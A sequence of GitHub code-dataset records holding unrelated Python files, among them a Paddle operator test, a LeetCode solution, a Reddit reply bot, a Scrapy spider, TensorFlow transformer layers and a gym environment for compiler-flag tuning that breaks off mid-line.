TestExpNPUOP(OpTest):\n def setUp(self):\n\n self.set_npu()\n self.place = paddle.NPUPlace(0)\n self.op_type = \"exp\"\n self.init_dtype()\n self.init_kernel_type()\n\n np.random.seed(SEED)\n x = np.random.uniform(0.1, 1, [11, 17]).astype(self.dtype)\n out = np.exp(x)\n\n self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}\n self.outputs = {'Out': out}\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n def test_check_grad(self):\n self.check_grad_with_place(self.place, ['X'], 'Out')\n\n def init_dtype(self):\n self.dtype = np.float32\n\n def init_kernel_type(self):\n pass\n\n def set_npu(self):\n self.__class__.use_npu = True\n\n\nclass TestExpNPUOPFloat64(TestExpNPUOP):\n def init_dtype(self):\n self.dtype = np.float64\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"EnnSou/ooss-paddle2.3","sub_path":"python/paddle/fluid/tests/unittests/npu/test_exp_op_npu.py","file_name":"test_exp_op_npu.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"44268483752","text":"# 最低票价。这个题目说是反向DP,但是正向的也是非常好做,这个题应该很容易解出来才对。\n# 建立res来存储天数。那么当前的就是等于res[i-1],res[i-7],res[i-30]这三个里面加上cost之后的最小值。\n# 如果i<7或者<30,那么只需要将该天定义为7和30的钱数即可。\nclass Solution(object):\n def mincostTickets(self, days, costs):\n \"\"\"\n :type days: List[int]\n :type costs: List[int]\n :rtype: int\n \"\"\"\n # res = [0]*400\n # if days[-1]==365:\n # days.pop()\n # res[365] = costs[0]\n # for i in range(364,0,-1):\n # if days!=[] and i == days[-1]:\n # days.pop()\n # res[i] = min(res[i+1]+costs[0],res[i+7]+costs[1],res[i+30]+costs[2])\n # else:\n # res[i] = res[i+1]\n # return res[1]\n \n res = [0]*(days[-1]+1)\n k = 0\n for i in range(1,len(res)):\n if i!=days[k]:\n res[i] = res[i-1]\n else:\n a,b,c = costs[0],costs[1],costs[2]\n k += 1\n a = res[i-1]+costs[0]\n if i-7>=0:\n b = res[i-7]+costs[1]\n if i-30>=0:\n c = res[i-30]+costs[2]\n res[i] = min(a,b,c)\n return res[-1]\n","repo_name":"whywhs/Leetcode","sub_path":"Leetcode983_M.py","file_name":"Leetcode983_M.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71343045905","text":"from prettytable import PrettyTable\n\n\ndef output_base(base_name):\n my_table = PrettyTable()\n my_table.field_names = [\"Фамилия Имя\", \"Возраст\", \"Пол\"]\n try:\n with open(fr'../txt/{base_name}', 'r', encoding='utf-8') as fr:\n for i in fr:\n row = i.strip().split()\n full_name = \" \".join(row[:2])\n my_table.add_row([full_name, row[2], row[3]])\n print(my_table)\n except FileNotFoundError:\n print(f\"Базы c именем '{base_name}' нет\")\n\n\ndef write_read_base(base_name, key, employees=[]):\n with open(f'../txt/{base_name}', key, encoding='utf-8') as fw:\n if key == 'r':\n f = fw.readlines()\n return f\n for i in employees:\n print(i, file=fw)\n","repo_name":"Kvezac/homework21","sub_path":"lesson21_homework/python/write_read_file.py","file_name":"write_read_file.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20190057089","text":"car_dict = {}\n\nmakes = (\n (1, \"Toyota\"), (2, \"Nissan\"),\n (3, \"Ford\"), (4, \"Mini\"),\n (5, \"Honda\"), (6, \"Dodge\"),\n)\n\nmodels = (\n (1, \"Altima\", 2), (2, \"Thunderbird\", 3),\n (3, \"Dart\", 6), (4, \"Accord\", 5),\n (5, \"Prius\", 1), (6, \"Countryman\", 4),\n (7, \"Camry\", 1), (8, \"F150\", 3),\n (9, \"Civic\", 5), (10, \"Ram\", 6),\n (11, \"Cooper\", 4), (12, \"Pilot\", 5),\n (13, \"Xterra\", 2), (14, \"Sentra\", 2),\n (15, \"Charger\", 6)\n)\n\ncolors = (\n (1, \"Black\" ), (2, \"Charcoal\" ), (3, \"Red\" ), (4, \"Brick\" ),\n (5, \"Blue\" ), (6, \"Navy\" ), (7, \"White\" ), (8, \"Ivory\" )\n)\n\navailable_car_colors = (\n (1, 1), (1, 2), (1, 7), \n (2, 1), (2, 3), (2, 7), \n (3, 2), (3, 3), (3, 7), \n (4, 3), (4, 5), (4, 8),\n (5, 2), (5, 4), (5, 8), \n (6, 2), (6, 6), (6, 7), \n (7, 1), (7, 3), (7, 7), \n (8, 1), (8, 5), (8, 8),\n (9, 1), (9, 6), (9, 7), \n (10, 2), (10, 5), (10, 7), \n (11, 3), (11, 6), (11, 8), \n (12, 1), (12, 4), (12, 7),\n (13, 2), (13, 6), (13, 8), \n (14, 2), (14, 5), (14, 8), \n (15, 1), (15, 4), (15, 7)\n)\n\n# STEP 1 GRAB MAKES\n# make[1] for make in makes\n\n# STEP 2 GRAB MODELS\n# for model in models if model[2] == make[0]\n\n# STEP 3 LOOP THROUGH AVAILABLE COLORS AND COLOR CODES TO FIND MATCHES AND BUILD LIKE DICTIONARY\n# color[1] for available_car_color in available_car_colors for color in colors if model[0] == available_car_color[0] if available_car_color[1] == color[0]\n# {\n# make: {\n# model: [color, color, color]\n# model: [color, color, color]\n# },\n# model: [color, color, color]\n# model: [color, color, color]\n# }\n# ...\n# }\n\ncar_dicto = {\n make[1]:\n {\n model[1]: \n [color[1] for available_car_color in available_car_colors \n for color in colors if model[0] == available_car_color[0] if available_car_color[1] == color[0]] for model in models if model[2] == make[0]\n }\n for make in makes\n }\n\n# STEP 4 PRINT IT OUT\nfor k, v in car_dicto.items():\n print('\\n' + k + '\\n-----------------------------')\n for model in v:\n print(\"{0} available in {1}\".format(model, ', '.join(v[model])))\n","repo_name":"mccordgh/python_bangazon_orientation_exercise_CHALLENGE_CARS","sub_path":"cars.py","file_name":"cars.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33527940520","text":"from __future__ import division\n#\n# Copyright (c) 2015 Juniper Networks, Inc. All rights reserved.\n#\nfrom builtins import range\nfrom past.utils import old_div\nimport unittest\nimport tempfile\n\nimport sys, os, mock, gevent\n#sys.path.insert(0, os.path.abspath(\"..\"))\n#sys.path.append('../../tools/sandesh/library/python')\n\nmock_pkg = mock.MagicMock(name='mock_vnc_api')\nmock_mod = mock.MagicMock(name='mock_vnc_api_mod')\nmock_cls = mock.MagicMock(name='mock_VncApi')\nmock_mod.VncApi = mock_cls\nmock_pkg.vnc_api = mock_mod\n\nsys.modules['vnc_api'] = mock_pkg\nsys.modules['vnc_api.vnc_api'] = mock_mod\n\nfrom tf_snmp_collector.device_config import DeviceConfig\nfrom tf_snmp_collector.snmpctrlr import MaxNinTtime\n\n\nclass SnmpTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n pass\n #if (os.getenv('LD_LIBRARY_PATH', '').find('build/lib') < 0):\n # if (os.getenv('DYLD_LIBRARY_PATH', '').find('build/lib') < 0):\n # assert(False)\n\n #cls.cassandra_port = AnalyticsTest.get_free_port()\n #mockcassandra.start_cassandra(cls.cassandra_port)\n\n @classmethod\n def tearDownClass(cls):\n pass\n #mockcassandra.stop_cassandra(cls.cassandra_port)\n\n def write_file(self, s):\n f = tempfile.NamedTemporaryFile(delete=False)\n f.write(s)\n f.close()\n return f.name\n\n def write_cfg_file(self):\n return self.write_file('[DEFAULTS]\\nfile = dev.ini')\n\n def write_dev_file(self):\n return self.write_file('[1.1.1.1]\\nCommunity = public\\nVersion = 2')\n\n def delete_file(self, filename):\n if os.path.exists(filename):\n os.unlink(filename)\n\n def systestsetUp(self):\n self.cfgfl = self.write_cfg_file()\n self.devfl = self.write_dev_file()\n self.http_port = 9042\n self.dfgp = CfgParser(\n '-c %s --file %s --http_server_port %d' % (self.cfgfl,\n self.devfl, self.http_port))\n self.tasks = []\n self.vizd_obj = None\n\n\n def systesttearDown(self):\n self.delete_file(self.cfgfl)\n self.delete_file(self.cfgfl)\n\n def test_000_snmp_devcfg(self):\n #logging.info(\"%%% test_000_snmp_devcfg %%%\")\n self.assertEqual(1, 1)\n\nclass MaxNinTtimeTest(unittest.TestCase):\n def setUp(self):\n self.n = 5\n self.t = 5\n self.mntt = MaxNinTtime(self.n, self.t)\n\n def test_000_addone(self):\n self.assertEqual(len(self.mntt._slots), self.n)\n self.mntt.add()\n self.assertEqual(self.mntt._pointer, 1)\n\n def test_010_addmore(self):\n ts = [self.mntt.add() for i in range(self.n + old_div(self.n,2))]\n self.assertEqual(len([p for p in [t-ts[\n i-1] for i,t in enumerate(ts)][1:] if p>old_div(self.t,2)]), 1) #one jump\n\n def test_020_fs(self):\n ts = [self.mntt.add() for i in range(self.n + old_div(self.n,2))]\n self.assertFalse(self.mntt.ready4full_scan())\n gevent.sleep(self.t + .1)\n self.assertTrue(self.mntt.ready4full_scan())\n\nif __name__ == '__main__':\n unittest.main(catchbreak=True)\n","repo_name":"tungstenfabric/tf-analytics","sub_path":"tf-snmp-collector/tf_snmp_collector/tests/snmp_test.py","file_name":"snmp_test.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"2724172237","text":"import praw\nimport time\nimport re\n\nreddit = praw.Reddit('bot1')\nuser = reddit.redditor('the-hug-bot')\n\nregexMatch = '.*need.*hug'\n\nmentalHealthSubreddits = [\n\"mentalHealth\",\n\"tifu\",\n\"raisedbynarcissists\",\n\"act\",\n\"sat\",\n\"applyingtocollege\",\n\"teenagers\",\n\"insaneparents\",\n\"apstudents\",\n\"offmychest\"\n]\n\n'''\n# Testing environment\nmentalHealthSubreddits = [\n\"7iooibottesting\"\n]\n'''\n\n\nglobal commentList\ncommentList = []\n\ndef processComment(comment):\n global commentList\n commentID = comment.id\n if commentID not in commentList:\n bodyText = comment.body\n if re.search(regexMatch, bodyText, re.IGNORECASE):\n comment.reply(\"*Hug*\")\n print(\"New comment posted.\\n\", flush=True)\n commentList.append(commentID)\n\n\nwhile True:\n for sub in mentalHealthSubreddits:\n #print(commentList, flush=True)\n #print(\"Reading new subreddit...\\n\" + sub, flush=True)\n for comment in reddit.subreddit(sub).stream.comments(pause_after=0):\n time.sleep(0.01)\n if comment is None:\n break\n else:\n try:\n processComment(comment)\n except:\n print(\"Comment processing produced an error. Trying to wait to resolve problem.\", flush=True) #New accounts are rate limited\n time.sleep(60)\n try:\n processComment(comment)\n except:\n print(\"Failure! RATELIMIT is either too high or there is a fatal problem.\", flush=True)\n","repo_name":"jacob-zietek/RedditHugBot","sub_path":"HugBot.py","file_name":"HugBot.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14286841417","text":"import csv\r\nfrom colorama import Fore, Style\r\nfrom prettytable import PrettyTable\r\nimport pyfiglet\r\nimport time\r\nimport os\r\n\r\n\r\nclass registration():\r\n e_name = ''\r\n age = ''\r\n date_of_birth = ''\r\n e_id = ''\r\n e_id_number = ''\r\n address = ''\r\n contact = ''\r\n email = ''\r\n\r\n def register_data(self):\r\n\r\n with open(\"registration.csv\", 'a', newline='') as file:\r\n data = csv.writer(file)\r\n\r\n while True:\r\n self.e_name = input(\"name: \")\r\n self.age = input(\"age: \")\r\n self.date_of_birth = input(\"date of birth: \")\r\n self.e_id = input(\"employee id: \")\r\n\r\n flag = 0\r\n while flag == 0:\r\n self.e_id_number = input(\"employee id number(AADHAR): \")\r\n if len(self.e_id_number) != 12:\r\n print('enter 12 digit id_number')\r\n flag = 0\r\n else:\r\n flag = 1\r\n\r\n self.address = input(\"address: \")\r\n\r\n flag = 0\r\n while flag == 0:\r\n self.contact = input(\"contact: \")\r\n if len(self.contact) != 10:\r\n print('enter 10 digit contact number')\r\n flag = 0\r\n else:\r\n flag = 1\r\n self.email = input(\"email: \")\r\n\r\n record = [self.e_name, self.age, self.date_of_birth, self.e_id,\r\n self.e_id_number, self.address, self.contact, self.email]\r\n print(record)\r\n data.writerow(record)\r\n ch = input(\"want to enter more data? :- \")\r\n if ch == 'n' or ch == 'N':\r\n break\r\n\r\n file.close()\r\n input(\"!!!!PRESS ENTER TO MAIN MENU!!!!\")\r\n os.system('cls')\r\n main()\r\n\r\n def fetch_data(self):\r\n\r\n l1 = []\r\n d1 = int(input(\r\n \"SELECT ANY ONE:-\\n1> See all records\\n2> See specific record\\n\"))\r\n\r\n with open('registration.csv', 'r') as f:\r\n record = csv.reader(f, delimiter=',', dialect='excel')\r\n\r\n if d1 == 1:\r\n for dta in record:\r\n l1.append(dta)\r\n\r\n print(Fore.BLUE)\r\n newTable = PrettyTable(\r\n ['e_name', 'age', 'date_of_birth', 'e_id', 'e_id_number', 'address', 'contact', 'email'])\r\n newTable.add_rows(l1)\r\n print(newTable)\r\n print(Style.RESET_ALL)\r\n else:\r\n data1 = input(\"enter the employee id to see the record: \")\r\n for dta in record:\r\n if data1 in dta:\r\n l1 = dta\r\n print(l1)\r\n print(Fore.LIGHTBLUE_EX+'employee_name: |', l1[0])\r\n print('age: |', l1[1])\r\n print('date of birth: |', l1[2])\r\n print('employee id: |', l1[3])\r\n print('employee id number: |', l1[4])\r\n print('address: |', l1[5])\r\n print('contact: |', l1[6])\r\n print('email: |', l1[7])\r\n print(Style.RESET_ALL)\r\n\r\n if data1 not in l1:\r\n print(\"record not found!!!!!\")\r\n\r\n f.close()\r\n input(\"!!!!PRESS ENTER TO MAIN MENU!!!!\")\r\n os.system('cls')\r\n main()\r\n\r\n def update_data(self):\r\n\r\n newrecord = []\r\n l1 = []\r\n\r\n with open('registration.csv', 'r+', newline='') as f:\r\n\r\n data = csv.reader(f, delimiter=',', dialect='excel')\r\n\r\n fields = ['e_name', 'age', 'date_of_birth', 'e_id',\r\n 'e_id_number', 'address', 'contact', 'email']\r\n\r\n search_name = input(\r\n \"enter the name of the employee whose record to be updated: \")\r\n\r\n print(\"1- name\\n2- age\\n3- date of birth\\n4- employee id\\n5- employee id number\\n6- address\\n7- contact\\n8- email\\n\")\r\n\r\n selectfield = int(\r\n input(\"enter the number of field that u want to update: \"))\r\n\r\n for dta in data:\r\n l1.append(dta)\r\n p = len(l1)\r\n\r\n for i in range(p-1):\r\n if l1[i][0] == search_name:\r\n\r\n if selectfield == 1:\r\n l1[i][0] = input(\"enter the new data: \")\r\n\r\n if selectfield == 2:\r\n l1[i][1] = input(\"enter the new data: \")\r\n\r\n if selectfield == 3:\r\n l1[i][2] = input(\"enter the new data: \")\r\n\r\n if selectfield == 4:\r\n l1[i][3] = input(\"enter the new data: \")\r\n\r\n if selectfield == 5:\r\n l1[i][4] = input(\"enter the new data: \")\r\n\r\n if selectfield == 6:\r\n l1[i][5] = input(\"enter the new data: \")\r\n\r\n if selectfield == 7:\r\n l1[i][6] = input(\"enter the new data: \")\r\n\r\n if selectfield == 8:\r\n l1[i][7] = input(\"enter the new data: \")\r\n\r\n f.seek(0, 0)\r\n dta1 = csv.writer(f, delimiter=',', dialect='excel')\r\n dta1.writerows(newrecord)\r\n f.close()\r\n input(\"!!!!PRESS ENTER TO MAIN MENU!!!!\")\r\n os.system('cls')\r\n main()\r\n\r\n\r\ndef main():\r\n \r\n\r\n print(Fore.LIGHTGREEN_EX +\r\n (pyfiglet.figlet_format(text=\"HR MANAGEMENT SYSTEM\", font=\"digital\")))\r\n print(Fore.YELLOW+\"1> NEW REGISTRATION OF EMPLOYEE\\n2> SEE DETAIL OF EMPLOYEE\\n3> UPDATE THE PRE-EXISTING EMPLOYEE RECORD\\n4> EXIT\")\r\n print(Style.RESET_ALL)\r\n c = int(input(\"Enter ur choice: \"))\r\n\r\n if c == 1:\r\n r1.register_data()\r\n elif c == 2:\r\n r1.fetch_data()\r\n elif c == 3:\r\n r1.update_data()\r\n elif c == 4:\r\n print(\"thank u 😊😊\")\r\n exit()\r\n\r\nr1 = registration()\r\nmain()\r\n","repo_name":"anubhav009-pandey/HR-MANAGEMENT-PROJECT","sub_path":"HR PROJECT.PY","file_name":"HR PROJECT.PY","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10403226542","text":"from setuptools import setup\nfrom os import path\n\n\nPACKAGE_NAME = 'nameko_worker_logger'\n\nhere = path.abspath(path.dirname(__file__))\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\n\nsetup(\n name=PACKAGE_NAME,\n version='1.0.0',\n description='A package with logger for nameko worker',\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/emlid/Nameko-logging-ELK',\n author='Emlid ltd.',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n ],\n packages=[PACKAGE_NAME],\n install_requires=[\n 'nameko==2.11.0'\n ],\n)\n","repo_name":"emlid/nameko-ctx-logger","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"8391093011","text":"import re\n\nimport scrapy\n\nfrom scrapy.loader import ItemLoader\nfrom ..items import CqbItem\nfrom itemloaders.processors import TakeFirst\npattern = r'(\\xa0)?'\n\nclass CqbSpider(scrapy.Spider):\n\tname = 'cqb'\n\tstart_urls = ['https://www.ccbank.bg/bg/za-ckb/novini?page=1']\n\n\tdef parse(self, response):\n\t\tpost_links = response.xpath('//li[@class=\"news-list__item\"]/a/@href').getall()\n\t\tyield from response.follow_all(post_links, self.parse_post)\n\n\t\tnext_page = response.xpath('//a[@class=\"paginator__btn paginator__btn--next\"]/@href').get()\n\t\tif next_page:\n\t\t\tyield response.follow(next_page, self.parse)\n\n\n\tdef parse_post(self, response):\n\n\t\tdate = response.xpath('//time/@datetime').get()\n\t\tdate = re.findall(r'\\d+\\-\\d+\\-\\d+',date)\n\t\ttitle = response.xpath('//h1/text()').get().strip()\n\t\tcontent = response.xpath('//article[@class=\"text\"]//text()[not (ancestor::time) and not (ancestor::h1)]').getall()\n\t\tcontent = [p.strip() for p in content if p.strip()]\n\t\tcontent = re.sub(pattern, \"\",' '.join(content))\n\n\n\t\titem = ItemLoader(item=CqbItem(), response=response)\n\t\titem.default_output_processor = TakeFirst()\n\n\t\titem.add_value('title', title)\n\t\titem.add_value('link', response.url)\n\t\titem.add_value('content', content)\n\t\titem.add_value('date', date)\n\n\t\treturn item.load_item()\n","repo_name":"SimeonYS/cqb","sub_path":"cqb/spiders/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35321016505","text":"import tensorflow as tf\nimport numpy as np\n\nfrom tensorflow.keras.layers import Conv1D, LayerNormalization\n\n# This code is taken from the TF tutorial on transformers\n# https://www.tensorflow.org/tutorials/text/transformer\ndef scaled_dot_product_attention(q, k, v, mask=None):\n \"\"\" Calculate the attention weights.\n q, k, v must have matching leading dimensions.\n k, v must have matching penultimate dimension, i.e.: seq_len_k = seq_len_v.\n The mask has different shapes depending on its type(padding or look ahead)\n but it must be broadcastable for addition.\n\n Args:\n q: query shape == (..., seq_len_q, depth)\n k: key shape == (..., seq_len_k, depth)\n v: value shape == (..., seq_len_v, depth_v)\n mask: Float tensor with shape broadcastable\n to (..., seq_len_q, seq_len_k). Defaults to None.\n\n Returns:\n output, attention_weights\n \"\"\"\n\n matmul_qk = tf.matmul(q, k, transpose_b=True) # (..., seq_len_q, seq_len_k)\n\n # scale matmul_qk\n dk = tf.cast(tf.shape(k)[-1], tf.float32)\n scaled_attention_logits = matmul_qk / tf.math.sqrt(dk)\n\n # add the mask to the scaled tensor.\n if mask is not None:\n scaled_attention_logits += (mask * -1e9)\n\n # softmax is normalized on the last axis (seq_len_k) so that the scores\n # add up to 1.\n attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1) # (..., seq_len_q, seq_len_k)\n\n output = tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v)\n\n return output, attention_weights\n\n\nclass MultiHeadAttention(tf.keras.layers.Layer):\n def __init__(self, d_model, num_heads):\n super(MultiHeadAttention, self).__init__()\n self.num_heads = num_heads\n self.d_model = d_model\n\n assert d_model % self.num_heads == 0\n\n self.depth = d_model // self.num_heads\n\n self.wq = tf.keras.layers.Dense(d_model)\n self.wk = tf.keras.layers.Dense(d_model)\n self.wv = tf.keras.layers.Dense(d_model)\n\n self.dense = tf.keras.layers.Dense(d_model)\n\n def split_heads(self, x, batch_size):\n \"\"\"Split the last dimension into (num_heads, depth).\n Transpose the result such that the shape is (batch_size, num_heads, seq_len, depth)\n \"\"\"\n x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth))\n return tf.transpose(x, perm=[0, 2, 1, 3])\n\n def call(self, v, k, q, mask=None):\n batch_size = tf.shape(q)[0]\n\n q = self.wq(q) # (batch_size, seq_len, d_model)\n k = self.wk(k) # (batch_size, seq_len, d_model)\n v = self.wv(v) # (batch_size, seq_len, d_model)\n\n q = self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q, depth)\n k = self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len_k, depth)\n v = self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len_v, depth)\n\n # scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth)\n # attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k)\n scaled_attention, attention_weights = scaled_dot_product_attention(q, k, v, mask)\n\n # (batch_size, seq_len_q, num_heads, depth)\n scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3])\n\n # (batch_size, seq_len_q, d_model)\n concat_attention = tf.reshape(scaled_attention, (batch_size, -1, self.d_model))\n\n # (batch_size, seq_len_q, d_model)\n output = self.dense(concat_attention)\n\n return output, attention_weights\n\n\ndef point_wise_feed_forward_network(d_model, dff):\n return tf.keras.Sequential([\n tf.keras.layers.Dense(dff, activation='relu'), # (batch_size, seq_len, dff)\n tf.keras.layers.Dense(d_model) # (batch_size, seq_len, d_model)\n ])\n\n\ndef positional_encoding(positions, d_model, T=10000):\n\n if isinstance(positions, int):\n positions = np.arange(positions)\n else:\n positions = np.array(positions)\n\n def _get_angles(pos, i, d_model):\n angle_rates = 1 / np.power(T, (2 * (i//2)) / np.float32(d_model))\n return pos * angle_rates\n\n depths = np.arange(d_model)\n\n angle_rads = _get_angles(positions[:, np.newaxis],\n depths[np.newaxis, :],\n d_model)\n\n # apply sin to even indices in the array; 2i\n angle_rads[:, 0::2] = np.sin(angle_rads[:, 0::2])\n\n # apply cos to odd indices in the array; 2i+1\n angle_rads[:, 1::2] = np.cos(angle_rads[:, 1::2])\n\n pos_encoding = angle_rads[np.newaxis, ...]\n\n return tf.cast(pos_encoding, dtype=tf.float32)\n\n\nclass EncoderLayer(tf.keras.layers.Layer):\n def __init__(self, d_model, num_heads, dff, rate=0.1):\n super(EncoderLayer, self).__init__()\n\n self.mha = MultiHeadAttention(d_model, num_heads)\n self.ffn = point_wise_feed_forward_network(d_model, dff)\n\n self.layernorm1 = tf.keras.layers.LayerNormalization(epsilon=1e-6)\n self.layernorm2 = tf.keras.layers.LayerNormalization(epsilon=1e-6)\n\n self.dropout1 = tf.keras.layers.Dropout(rate)\n self.dropout2 = tf.keras.layers.Dropout(rate)\n\n def call(self, x, training=None, mask=None):\n attn_output, _ = self.mha(x, x, x, mask) # (batch_size, input_seq_len, d_model)\n attn_output = self.dropout1(attn_output, training=training)\n out1 = self.layernorm1(x + attn_output) # (batch_size, input_seq_len, d_model)\n\n ffn_output = self.ffn(out1) # (batch_size, input_seq_len, d_model)\n ffn_output = self.dropout2(ffn_output, training=training)\n out2 = self.layernorm2(out1 + ffn_output) # (batch_size, input_seq_len, d_model)\n\n return out2\n\n\nclass Encoder(tf.keras.layers.Layer):\n def __init__(self, num_layers, d_model, num_heads, dff, maximum_position_encoding, rate=0.1, layer_norm=False, T=10000):\n super(Encoder, self).__init__()\n\n self.d_model = d_model\n self.num_layers = num_layers\n\n self.lnorm_in = tf.keras.layers.LayerNormalization() if layer_norm else None\n self.lnorm_conv = tf.keras.layers.LayerNormalization() if layer_norm else None\n\n # replace embedding with 1d convolution\n self.conv_in = Conv1D(d_model, 1)\n # self.embedding = tf.keras.layers.Embedding(input_vocab_size, d_model)\n self.pos_encoding = positional_encoding(maximum_position_encoding, self.d_model, T=T)\n\n encoder_layers = [EncoderLayer(d_model, num_heads, dff, rate)\n for _ in range(num_layers)]\n self.encoder = tf.keras.Sequential(encoder_layers)\n\n self.dropout = tf.keras.layers.Dropout(rate)\n\n\n def call(self, x, training=None, mask=None):\n seq_len = tf.shape(x)[1]\n\n if self.lnorm_in:\n x = self.lnorm_in(x)\n\n # adding embedding and position encoding.\n x = self.conv_in(x, training=training) # (batch_size, input_seq_len, d_model)\n if self.lnorm_conv:\n x = self.lnorm_conv(x)\n\n x *= tf.math.sqrt(tf.cast(self.d_model, tf.float32))\n x += self.pos_encoding[:, :seq_len, :]\n\n x = self.dropout(x, training=training)\n\n x = self.encoder(x, training=training, mask=mask)\n\n return x # (batch_size, input_seq_len, d_model)\n","repo_name":"sentinel-hub/eo-flow","sub_path":"eoflow/models/transformer_encoder_layers.py","file_name":"transformer_encoder_layers.py","file_ext":"py","file_size_in_byte":7250,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"48"} +{"seq_id":"1693851203","text":"from pickle import FALSE\nimport gym\nimport subprocess\nimport numpy as np\nimport random\nimport os\nfrom numpy import dtype\nimport datetime\n\nDEBUG = False\n\nclass Memory_v0 (gym.Env):\n # Actions\n # Flags that are verified with ../Preprocess/Flag_Seive.sh\n # Use FLAG_NUM flags\n # Flag lists are stored in ../Preprocess/Valid_Flags.txt\n #\n # States\n # States are feature obtained from PCA in ../Preprocess/Faeture_PCA.py\n # States info are stored in ../Preprocess/Feature_PCA_Result.txt\n #\n\n NEG_INF = -1e8\n\n def print_action(self, action):\n print(\"Current action: \", end=\"\")\n for flag_idx in action:\n print(self.FLAG_LIST[flag_idx], end=\" | \")\n print(\"\")\n\n\n def print_feature(self):\n print(\"Current feature: \", end=\"\")\n for pca_idx in range(len(self.feature)):\n print(str(round(self.feature[pca_idx], 3)), end=\" \")\n print(\"\")\n\n\n def get_preprocess_values(self):\n with open(\"../Preprocess/Valid_Flags.txt\", \"r\") as f:\n self.TOTAL_FLAG_NUM = int(f.readline().strip())\n self.FLAG_LIST = list()\n for _ in range(self.TOTAL_FLAG_NUM):\n s = f.readline().strip()\n self.FLAG_LIST.append(s)\n\n if DEBUG:\n print(\"# Valid Flags: \", self.TOTAL_FLAG_NUM)\n print(\"Flag lists: \", self.FLAG_LIST)\n with open(\"../Preprocess/Feature_PCA_Result.txt\", \"r\") as f:\n self.FEATURE_NUM = int(f.readline().strip())\n\n\n def get_feature(self):\n # Run LLVM Pass feature extraction\n self.feature_raw_file = self.data_path + \"feature_\" + self.ir.split('.')[0] + \"_raw.in\"\n self.feature_pca_file = self.data_path + \"feature_\" + self.ir.split('.')[0] + \"_pca.in\"\n subprocess.run([\"bash\", \"feature_extract.sh\", self.tmp_ir, self.feature_raw_file])\n\n # Apply PCA to obtained feature\n subprocess.run([\"python3\", \"Feature_PCA.py\", self.feature_raw_file, self.feature_pca_file])\n feature = list()\n with open(self.feature_pca_file, \"r\") as f:\n self.FEATURE_NUM = int(f.readline().strip())\n for _ in range(self.FEATURE_NUM):\n feat = float(f.readline().strip())\n feature.append(feat)\n subprocess.run([\"rm\", self.feature_raw_file])\n subprocess.run([\"rm\", self.feature_pca_file])\n return feature\n\n\n def get_performance(self, ir, flags):\n retry_num = 0\n while True: # repeat until no error\n process = subprocess.Popen([\"bash\", \"compile_and_profile.sh\", ir, flags], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)\n if retry_num >= 2:\n print(process.communicate())\n\n if process.communicate()[0] == '': \n retry_num += 1\n print(\"Retrying get_performance: \", retry_num)\n if retry_num > 10: return self.base_performance\n continue\n performance = int(process.communicate()[0])\n errmsg = str(process.communicate()[1])\n if errmsg != \"\":\n print(\" ! (COMPILE_AND_PROFILE.SH ERR) ERRMSG: \", errmsg)\n break\n return performance\n\n\n def get_reward (self, action):\n process = subprocess.Popen([\"stat\", \"-c%s\", self.data_ir], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)\n if self.base_ir_size != int(process.communicate()[0]):\n print(\"Update base\")\n # self.base_performance = self.get_performance(self.data_ir, \"-no-flag\")\n self.base_performance = self.get_performance(self.data_ir, \"-o0\")\n\n flags = \"\"\n for flag_idx in action:\n flags += (self.FLAG_LIST[flag_idx] + \" \")\n performance = self.get_performance(self.tmp_ir, flags.strip())\n diff = performance - self.base_performance # low memory usage is good\n percent = (diff / self.base_performance)*100\n print(\"Memory Usage: \", round(percent, 3), \"% (neg is good)\")\n reward = - percent * 100\n return reward # performance improvement is good\n\n\n metadata = { \"render.modes\": [\"human\"] }\n\n def __init__ (self):\n\n # Currently using irfile move to workspace\n path_prefix = \"env_\" + str(random.randint(0, 1000000)) + \"/\" # File should be seperated for multi-core\n self.ir = \"target.bc\"\n self.tmp_path = \"./tmp/\" + path_prefix\n self.data_path = \"./data/\" + path_prefix\n subprocess.run([\"mkdir\", self.tmp_path])\n subprocess.run([\"mkdir\", self.data_path])\n self.tmp_ir = \"./tmp/\" + path_prefix + self.ir # 